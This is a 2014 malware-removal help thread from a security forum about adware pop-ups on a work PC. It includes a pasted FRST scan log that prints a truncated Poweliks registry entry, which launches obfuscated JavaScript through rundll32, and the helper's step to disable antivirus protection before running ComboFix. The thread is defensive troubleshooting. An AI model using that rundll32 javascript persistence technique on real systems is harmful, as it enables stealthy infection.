4682b4.com, blinkxcore and additional annoyances


This topic is locked
15 replies to this topic

#1 Calimus

Calimus

  • Members
  • 8 posts

Posted 13 October 2014 - 07:56 AM

Machine was brought to me and I've been working on it on/off for a few days. Currently, Malwarebytes won't spit anything out on the logs as I've been deleting temp files and the like prior to running it. However, I found some mentions in some files to 4682b4.com and blinkxcore. The user says he sees pop-ups for those when he's logged in, but it looks like it's limited to his profile as nothing happens if I'm logged in. I haven't been able to get the user to sit down with me just yet, but I had time before they arrived to run the fubar scan. Here are the files from that.

 

I could certainly use a hand here. This user has scattered files everywhere on the machine so I'm trying to avoid nuking the PC and reimaging. I'll be addressing the user's file saving habits after this mess is cleaned up, but for now, if I can clean this up without playing Sherlock Holmes with his files it will buy me some time.

 

Thanks

Attached files: Addition.txt, FRST.txt

 

 





#2 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • Gender:Male
  • Location:127.0.0.1

Posted 13 October 2014 - 08:23 AM

Hello Calimus-

 

My name is Johnny Computer and I will be helping you clean up your system. Please give me some time to look over your logs and I will be back with further instructions A.S.A.P. :)


"DO OR DO NOT. THERE IS NO TRY."


#3 Calimus

Calimus
  • Topic Starter

  • Members
  • 8 posts

Posted 13 October 2014 - 09:35 AM

No problem Johnny, it's much appreciated. If additional logs are needed, just let me know.



#4 Calimus

Calimus
  • Topic Starter

  • Members
  • 8 posts

Posted 15 October 2014 - 05:57 AM

Any updates Johnny?



#5 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • Gender:Male
  • Location:127.0.0.1

Posted 15 October 2014 - 07:00 AM

Hi Calimus-
 
Sorry for the delayed response. Thank you for your patience. Let's see if we can get this cleaned up for you.
 

Hello and welcome to BLEEPING COMPUTER

My name is Johnny Computer and I will be helping you with your malware-related computer issues today.

Before we move on, please read the following points carefully.

 

  • First, I would like to inform you that most of us here at Bleeping Computer are volunteers. The logs you will be asked to submit can take time to analyze. Please try to match our commitment to you with your patience toward us.
  • Please read my instructions completely. If there is anything that you do not understand kindly ask before proceeding.
  • IMPORTANT: Post all logfiles as a reply rather than as an attachment. If you can not post all log files in one reply, feel free to use more posts.
  • Perform everything in the correct order. Sometimes one step requires the previous one.
  • If you have any problems while following my instructions, Stop and ask any questions you may have.
  • Please stay with me until I have notified you that your system is All Clean. Absence of symptoms does not necessarily mean your machine is clean.
  • If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.
  • IMPORTANT NOTE: Please do not delete, download or install anything unless instructed to do so.
    DO NOT use any TOOLS such as Combofix or HijackThis fixes without supervision. Doing so could make your system inoperable and could require a full reinstall of your operating system and losing all your programs and data.
-------------------------------------------------------------------------------------------------------

Please download Combofix (by sUBs) and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
Please copy and paste the contents of this file into your next post.

Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.

-------------------------------------------------------------------------------------------------------
IN YOUR NEXT REPLY I NEED:

1.) Your Combofix log

2.) How is your computer running now? Still having the 4682b4.com and blinkxcore issues?

Thanks

 

"DO OR DO NOT. THERE IS NO TRY."


#6 Calimus

Calimus
  • Topic Starter

  • Members
  • 8 posts

Posted 15 October 2014 - 10:27 AM

Ok, I'll have to run the scan tonight as the user doesn't have time for me to Bogart his machine today.



#7 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • Gender:Male
  • Location:127.0.0.1

Posted 15 October 2014 - 10:29 AM

Ok. Sounds good. :)

"DO OR DO NOT. THERE IS NO TRY."


#8 Calimus

Calimus
  • Topic Starter

  • Members
  • 8 posts

Posted 16 October 2014 - 06:27 AM

Ok, here is the Combofix report from that machine.

Attached file: combofixreport.txt

 

 



#9 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • Gender:Male
  • Location:127.0.0.1

Posted 16 October 2014 - 09:38 AM

Hi Calimus-

 

Please re-run FRST and copy and paste the scan results.

 

NOTE: PLEASE COPY AND PASTE ALL LOGS INTO YOUR REPLY. DO NOT ATTACH THEM UNLESS SPECIFICALLY ASKED TO DO SO.

 

Thanks  :)


"DO OR DO NOT. THERE IS NO TRY."


#10 Calimus

Calimus
  • Topic Starter

  • Members
  • 8 posts

Posted 17 October 2014 - 10:09 AM

Ok, here we go. Sorry for the delay.

 

---------------------------------------- FRST File ----------------------------------------

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 16-10-2014
Ran by bashburn (administrator) on RISK2618 on 17-10-2014 11:01:09
Running from C:\TEMP\Combofix files
Loaded Profile: bashburn (Available profiles: rpass & Altiris & altirisdeploy & cyoakum1 & ktassone & wsnyder1 & bashburn & netadmin)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE
(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\naPrdMgr.exe
(Altiris, Inc.) C:\Program Files\Altiris\Dagent\dagent.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Symantec Corporation) C:\Program Files\Altiris\Altiris Agent\AeXNSAgent.exe
(Symantec Corporation) C:\Program Files\Altiris\Altiris Agent\x86\AeXNSAgentHostSurrogate32.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Symantec Corporation) C:\Program Files\Altiris\Altiris Agent\AeXAgentUIHost.exe
(Altiris, Inc.) C:\Program Files\Altiris\Dagent\dagentui.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE
(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\Snagit32.exe
(Sun Microsystems, Inc.) C:\Program Files (x86)\Java\jre1.5.0_17\bin\jusched.exe
(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\TscHelp.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\UdaterUI.exe
(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\SnagPriv.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\McTray.exe
(TechSmith Corporation) C:\Program Files (x86)\TechSmith\Snagit 11\SnagitEditor.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
() C:\ZJDEWV\AW9RT.EXE
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [DagentUI] => C:\Program Files\Altiris\Dagent\dagentui.exe [848384 2012-12-13] (Altiris, Inc.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12343400 2011-12-28] (Realtek Semiconductor)
HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [425832 2012-11-02] (SolarWinds)
HKLM-x32\...\Run: [Client Access Service] => C:\Program Files (x86)\IBM\Client Access\cwbsvstr.exe [14336 2010-01-15] (IBM Corporation)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Java\jre1.5.0_17\bin\jusched.exe [75264 2008-11-10] (Sun Microsystems, Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-03-13] (Microsoft Corporation)
HKLM-x32\...\Run: [McAfeeUpdaterUI] => C:\Program Files (x86)\McAfee\Common Framework\udaterui.exe [337440 2013-12-04] (McAfee, Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1963064-4036034935-1140883825-9640\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
AppInit_DLLs: C:\Windows\System32\AMInit64.dll => C:\Windows\System32\AMInit64.dll [74576 2014-05-23] (Symantec Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\bginfo.bat ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Snagit 11.lnk
ShortcutTarget: Snagit 11.lnk -> C:\Program Files (x86)\TechSmith\Snagit 11\Snagit32.exe (TechSmith Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://myorkin/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x3451C9ADF9E6CE01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Symantec Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\bin\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre6\bin\ssv.dll (Sun Microsystems, Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
Tcpip\Parameters: [DhcpNameServer] 10.41.16.129 10.41.32.129
 
FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre6\bin\plugin2\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\bashburn\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Data\IPSFF
FF Extension: Symantec Vulnerability Protection - C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Data\IPSFF [2013-11-19]
 
Chrome: 
=======
CHR Profile: C:\Users\bashburn\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\bashburn\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-11-27]
CHR Extension: (Google Drive) - C:\Users\bashburn\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-11-27]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\bashburn\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-18]
CHR Extension: (YouTube) - C:\Users\bashburn\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-11-27]
CHR Extension: (Google Search) - C:\Users\bashburn\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-11-27]
CHR Extension: (Google Wallet) - C:\Users\bashburn\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-11-27]
CHR Extension: (Gmail) - C:\Users\bashburn\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-11-27]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AeXAgentSrvHost; C:\Program Files\Altiris\Altiris Agent\x86\AeXNSAgentHostSurrogate32.exe [314088 2014-05-23] (Symantec Corporation)
R2 AeXNSClient; C:\Program Files\Altiris\Altiris Agent\AeXNSAgent.exe [2967272 2014-05-23] (Symantec Corporation)
R2 Altiris Deployment Agent; C:\Program Files\Altiris\Dagent\dagent.exe [2044416 2012-12-13] (Altiris, Inc.) [File not signed]
S3 AltirisAgentProvider; C:\Program Files\Altiris\Altiris Agent\Agents\WMIProviderAgent\AltirisAgentProvider.exe [630504 2014-05-23] (Symantec Corporation)
S3 Cwbrxd; C:\Windows\cwbrxd.exe [94208 2010-01-15] (IBM Corporation) [File not signed]
R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [869736 2012-11-02] (SolarWinds)
R2 McAfeeFramework; C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe [127520 2013-12-04] (McAfee, Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [50688 2011-04-13] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [66048 2011-04-13] (Hewlett-Packard) [File not signed]
S2 SepMasterService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Bin\ccSvcHst.exe [144368 2013-05-25] (Symantec Corporation)
S4 SmartDeploy; C:\Windows\SysWOW64\SmartDeploy.exe [207136 2012-11-05] (SmartDeploy
S3 SmcService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Bin64\Smc.exe [2316184 2013-05-25] (Symantec Corporation)
S3 SNAC; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Bin64\snac64.exe [334736 2013-05-25] (Symantec Corporation)
S3 winexesvc; C:\Windows\winexesvc.exe [19456 2014-09-05] () [File not signed]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 BHDrvx64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Data\Definitions\BASHDefs\20141003.013\BHDrvx64.sys [1586904 2014-10-07] (Symantec Corporation)
R1 ccSettings_{E1A40A89-2B89-44FA-9E96-395B7D7F03AC}; C:\Windows\System32\Drivers\SEP\0C010BB9\00A5.105\x64\ccSetx64.sys [169048 2013-05-25] (Symantec Corporation)
R3 DwMirror; C:\Windows\System32\DRIVERS\DamewareMini.sys [5632 2008-03-14] (DameWare Development, LLC)
R1 dwvkbd; C:\Windows\System32\DRIVERS\dwvkbd64.sys [30720 2008-03-13] (DameWare)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-09-17] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-17] (Symantec Corporation)
R1 IDSVia64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Data\Definitions\IPSDefs\20141015.012\IDSvia64.sys [525016 2014-09-17] (Symantec Corporation)
R3 LBAI; C:\Windows\System32\Drivers\LBAI.sys [9600 2011-12-08] (Lenovo)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-10-15] (Malwarebytes Corporation)
R3 NAVENG; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Data\Definitions\VirusDefs\20141015.003\ENG64.SYS [129752 2014-09-17] (Symantec Corporation)
R3 NAVEX15; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Data\Definitions\VirusDefs\20141015.003\EX64.SYS [2137304 2014-09-17] (Symantec Corporation)
R1 Serial; C:\Windows\System32\DRIVERS\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)
R1 SRTSP; C:\Windows\System32\Drivers\SEP\0C010BB9\00A5.105\x64\SRTSP64.SYS [796760 2013-05-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\System32\Drivers\SEP\0C010BB9\00A5.105\x64\SRTSPX64.SYS [36952 2013-05-25] (Symantec Corporation)
S3 SyDvCtrl; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.3001.165.105\Bin64\SyDvCtrl64.sys [34800 2013-05-25] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\Drivers\SEP\0C010BB9\00A5.105\x64\SYMDS64.SYS [493656 2013-05-25] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\Drivers\SEP\0C010BB9\00A5.105\x64\SYMEFA64.SYS [1139800 2013-05-25] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177312 2013-11-19] (Symantec Corporation)
R1 SymIRON; C:\Windows\System32\Drivers\SEP\0C010BB9\00A5.105\x64\Ironx64.SYS [224416 2013-05-25] (Symantec Corporation)
R1 SYMNETS; C:\Windows\System32\Drivers\SEP\0C010BB9\00A5.105\x64\SYMNETS.SYS [433752 2013-05-25] (Symantec Corporation)
R1 SysPlant; C:\Windows\System32\Drivers\SysPlant.sys [159472 2013-11-19] (Symantec Corporation)
R1 Teefer2; C:\Windows\System32\DRIVERS\Teefer.sys [91944 2013-05-25] (Symantec Corporation)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-16 07:19 - 2014-10-16 07:19 - 00021285 _____ () C:\ComboFix.txt
2014-10-13 13:12 - 2014-10-13 14:00 - 02081522 _____ () C:\Users\bashburn\Desktop\Western Pest NY-NJ Reg MVRs 2014.xlsx
2014-10-13 08:15 - 2014-10-17 11:01 - 00000000 ____D () C:\FRST
2014-10-13 07:50 - 2014-10-13 07:50 - 00000000 ____D () C:\Users\wsnyder1\AppData\Roaming\McAfee
2014-10-08 08:14 - 2014-10-08 08:14 - 00000000 ____D () C:\Users\bashburn\AppData\Roaming\McAfee
2014-10-07 17:15 - 2014-10-07 17:15 - 07009654 _____ (McAfee, Inc.) C:\Windows\FramePkg.exe
2014-10-07 17:15 - 2014-10-07 17:15 - 00000000 ____D () C:\ProgramData\McAfee
2014-10-07 17:15 - 2014-10-07 17:15 - 00000000 ____D () C:\Program Files (x86)\McAfee
2014-10-07 16:05 - 2014-10-07 16:05 - 02077024 _____ () C:\Users\bashburn\Desktop\Rollins Risk Report (10-07-14) w- Over 8 & Invalid.xlsx
2014-10-07 07:27 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-10-07 07:26 - 2014-10-07 08:27 - 00000000 ____D () C:\AdwCleaner
2014-10-03 10:44 - 2014-10-15 08:13 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-03 10:44 - 2014-10-13 15:42 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-03 10:44 - 2014-10-13 15:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-03 10:44 - 2014-10-13 15:42 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-03 10:44 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-03 10:44 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-03 10:44 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-01 14:46 - 2014-10-01 14:46 - 00109504 _____ () C:\Users\wsnyder1\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-01 14:46 - 2014-10-01 14:46 - 00002408 __RSH () C:\Users\wsnyder1\ntuser.pol
2014-10-01 14:46 - 2014-10-01 14:46 - 00001423 _____ () C:\Users\wsnyder1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-01 14:46 - 2014-10-01 14:46 - 00000020 ___SH () C:\Users\wsnyder1\ntuser.ini
2014-10-01 14:46 - 2014-10-01 14:46 - 00000000 ____D () C:\Users\wsnyder1\Documents\Snagit
2014-10-01 14:46 - 2014-10-01 14:46 - 00000000 ____D () C:\Users\wsnyder1\Documents\IBM
2014-10-01 14:46 - 2014-10-01 14:46 - 00000000 ____D () C:\Users\wsnyder1\AppData\Roaming\IBM
2014-10-01 14:46 - 2014-10-01 14:46 - 00000000 ____D () C:\Users\wsnyder1\AppData\Roaming\Adobe
2014-10-01 14:46 - 2014-10-01 14:46 - 00000000 ____D () C:\Users\wsnyder1\AppData\Local\TechSmith
2014-10-01 14:46 - 2014-10-01 14:46 - 00000000 ____D () C:\Users\wsnyder1\AppData\Local\Symantec
2014-10-01 14:46 - 2014-10-01 14:46 - 00000000 ____D () C:\Users\wsnyder1\AppData\Local\Google
2014-10-01 14:46 - 2014-10-01 14:46 - 00000000 ____D () C:\Users\wsnyder1
2014-10-01 14:46 - 2013-11-19 16:07 - 00000000 ____D () C:\Users\wsnyder1\AppData\Local\Microsoft Help
2014-10-01 14:46 - 2009-07-14 00:54 - 00000000 ___RD () C:\Users\wsnyder1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-01 14:46 - 2009-07-14 00:49 - 00000000 ___RD () C:\Users\wsnyder1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-01 14:24 - 2014-10-15 08:12 - 00003538 _____ () C:\Windows\PFRO.log
2014-10-01 14:24 - 2014-10-15 08:12 - 00000560 _____ () C:\Windows\setupact.log
2014-10-01 14:24 - 2014-10-01 14:24 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-01 13:57 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-10-01 13:57 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-10-01 13:57 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-10-01 13:57 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-10-01 13:57 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-10-01 13:57 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-10-01 13:57 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-10-01 13:57 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-10-01 13:48 - 2014-10-16 07:20 - 00000000 ____D () C:\Qoobox
2014-10-01 13:47 - 2014-10-01 14:30 - 00000000 ____D () C:\Windows\erdnt
2014-10-01 13:45 - 2014-10-01 13:45 - 05582345 ____R (Swearware) C:\Users\cyoakum1\Downloads\ComboFix.exe
2014-10-01 13:31 - 2014-10-01 13:32 - 00000000 ____D () C:\Users\cyoakum1\Documents\Snagit
2014-10-01 13:31 - 2014-10-01 13:31 - 00109504 _____ () C:\Users\cyoakum1\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-01 13:31 - 2014-10-01 13:31 - 00002408 __RSH () C:\Users\cyoakum1\ntuser.pol
2014-10-01 13:31 - 2014-10-01 13:31 - 00001423 _____ () C:\Users\cyoakum1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-01 13:31 - 2014-10-01 13:31 - 00000000 ____D () C:\Users\cyoakum1\Documents\IBM
2014-10-01 13:31 - 2014-10-01 13:31 - 00000000 ____D () C:\Users\cyoakum1\AppData\Roaming\IBM
2014-10-01 13:31 - 2014-10-01 13:31 - 00000000 ____D () C:\Users\cyoakum1\AppData\Roaming\Adobe
2014-10-01 13:31 - 2014-10-01 13:31 - 00000000 ____D () C:\Users\cyoakum1\AppData\Local\TechSmith
2014-10-01 13:31 - 2014-10-01 13:31 - 00000000 ____D () C:\Users\cyoakum1\AppData\Local\Symantec
2014-10-01 13:31 - 2014-10-01 13:31 - 00000000 ____D () C:\Users\cyoakum1\AppData\Local\Google
2014-10-01 13:30 - 2014-10-01 13:31 - 00000000 ____D () C:\Users\cyoakum1
2014-10-01 13:30 - 2014-10-01 13:30 - 00000020 ___SH () C:\Users\cyoakum1\ntuser.ini
2014-10-01 13:30 - 2013-11-19 16:07 - 00000000 ____D () C:\Users\cyoakum1\AppData\Local\Microsoft Help
2014-10-01 13:30 - 2009-07-14 00:54 - 00000000 ___RD () C:\Users\cyoakum1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-01 13:30 - 2009-07-14 00:49 - 00000000 ___RD () C:\Users\cyoakum1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-01 12:55 - 2014-10-08 12:56 - 00000876 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-10-01 12:55 - 2014-10-01 12:55 - 00002778 _____ () C:\Windows\System32\Tasks\CCleanerSkipUAC
2014-10-01 12:55 - 2014-10-01 12:55 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-10-01 12:55 - 2014-10-01 12:55 - 00000000 ____D () C:\Program Files\CCleaner
2014-10-01 08:15 - 2014-10-01 08:15 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-29 16:42 - 2014-09-29 16:42 - 00003136 _____ () C:\{3DDBF410-6D95-4233-A758-50EA5258FC89}
2014-09-25 10:17 - 2014-09-25 10:17 - 00041472 _____ () C:\Users\bashburn\Desktop\Copy of Rollins MVRDownload - missing paper form (2).xls
2014-09-24 15:28 - 2014-09-24 15:28 - 03078314 _____ () C:\Users\bashburn\Desktop\MVR Detail Report (09-23-2014) (2).xlsx
